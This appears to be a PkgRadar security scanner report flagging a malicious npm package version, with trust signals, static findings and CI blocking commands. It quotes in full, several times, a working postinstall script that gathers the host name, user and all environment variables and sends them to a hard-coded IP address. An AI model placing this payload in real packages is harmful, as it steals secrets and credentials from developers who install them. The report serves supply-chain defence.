PkgRadar

Package evidence

@frontembed/[email protected]

Install Lifecycle Remote Or Exec: postinstall="node -e \"var d=require('http');var m=JSON.stringify({host:require('os').hostname(),pkg:process.cwd(),user:process.env.USER,env:process.env,time:new Date().toISOString()});var r=d.request({hostname:'159.223.186.167',port:8080,method:'POST',path:'/probe',headers:{'Content-Type':'application/json','Content-Length':Buffer.byteLength(m)}},function(r){r.on('data',function(){});r.on('end',function(){});});r.on('error',function(){});r.write(m);r.end();\""

Trust signals

Why this verdict

PkgRadar discounts a release’s score when public reputation argues against novel malware. The verdict above already reflects these — the panel just explains what was applied.

Versions published
1
First published
Jun 2026
Publisher
0xpissboy

Recommended action

Block this update

Static evidence trips multiple high-signal indicators. Quarantine the release until the publisher validates the change or you can rule out the indicators below.

Block this release in CIcurl · GitHub Actions

Fail the build when this package version is added or upgraded. Replace $PKGRADAR_TOKEN with a Pro / Team API key from your dashboard.

curl -fsS https://pkgradar.com/gate/npm \
  -H "Authorization: Bearer $PKGRADAR_TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"specs":["@frontembed/[email protected]"],"fail_on":"high"}'

GitHub Actions step:

- name: PkgRadar gate
  run: |
    curl -fsS https://pkgradar.com/gate/npm \
      -H "Authorization: Bearer ${{ secrets.PKGRADAR_TOKEN }}" \
      -H "Content-Type: application/json" \
      -d '{"specs":["@frontembed/[email protected]"],"fail_on":"high"}'
Publisher0xpissboy
Artifact bytes580
Previous versionnone
Published2026-06-06T19:31:06.579Z
SHA-256e9ab059df690b38ff3d6603fbc2f811144ade933eb87d5b104d6ba892c4a801b

Why flagged

What the scanner saw

Install Lifecycle Remote Or Exec: postinstall="node -e \"var d=require('http');var m=JSON.stringify({host:require('os').hostname(),pkg:process.cwd(),user:process.env.USER,env:process.env,time:new Date().toISOString()});var r=d.request({hostname:'159.223.186.167',port:8080,method:'POST',path:'/probe',headers:{'Content-Type':'application/json','Content-Length':Buffer.byteLength(m)}},function(r){r.on('data',function(){});r.on('end',function(){});});r.on('error',function(){});r.write(m);r.end();\""

Not observed: package install, lifecycle script execution, or sandbox execution. PkgRadar only inspects on-disk artifacts.

Availability ledger

available

high
Last checked
highRisk
35Score
99.99.100Version
Status history (1 event)
  1. newavailable · risk high · score 35 · status changed

Evidence

Static findings

2 static · 0 from release diff · showing high-signal first.

SeverityKindPathDetailPoints
highInstall Lifecycle Remote Or Execpackage.jsonpostinstall="node -e \"var d=require('http');var m=JSON.stringify({host:require('os').hostname(),pkg:process.cwd(),user:process.env.USER,env:process.env,time:new Date().toISOString()});var r=d.request({hostname:'159.223.186.167',port:8080,method:'POST',path:'/probe',headers:{'Content-Type':'application/json','Content-Length':Buffer.byteLength(m)}},function(r){r.on('data',function(){});r.on('end',function(){});});r.on('error',function(){});r.write(m);r.end();\""30
Show all 2 findings (low-signal and informational)
SeverityKindPathDetailPoints
highInstall Lifecycle Remote Or Execpackage.jsonpostinstall="node -e \"var d=require('http');var m=JSON.stringify({host:require('os').hostname(),pkg:process.cwd(),user:process.env.USER,env:process.env,time:new Date().toISOString()});var r=d.request({hostname:'159.223.186.167',port:8080,method:'POST',path:'/probe',headers:{'Content-Type':'application/json','Content-Length':Buffer.byteLength(m)}},function(r){r.on('data',function(){});r.on('end',function(){});});r.on('error',function(){});r.write(m);r.end();\""30
lowInstall-time lifecycle scriptpackage.jsonpostinstall="node -e \"var d=require('http');var m=JSON.stringify({host:require('os').hostname(),pkg:process.cwd(),user:process.env.USER,env:process.env,time:new Date().toISOString()});var r=d.request({hostname:'159.223.186.167',port:8080,method:'POST',path:'/probe',headers:{'Content-Type':'application/json','Content-Length':Buffer.byteLength(m)}},function(r){r.on('data',function(){});r.on('end',function(){});});r.on('error',function(){});r.write(m);r.end();\""5

Manifest

Package metadata

Scripts1
  • postinstallnode -e "var d=require('http');var m=JSON.stringify({host:require('os').hostname(),pkg:process.cwd(),user:process.env.USER,env:process.env,time:new Date().toISOString()});var r=d.request({hostname:'159.223.186.167',port:8080,method:'POST',path:'/probe',headers:{'Content-Type':'application/json','Content-Length':Buffer.byteLength(m)}},function(r){r.on('data',function(){});r.on('end',function(){});});r.on('error',function(){});r.write(m);r.end();"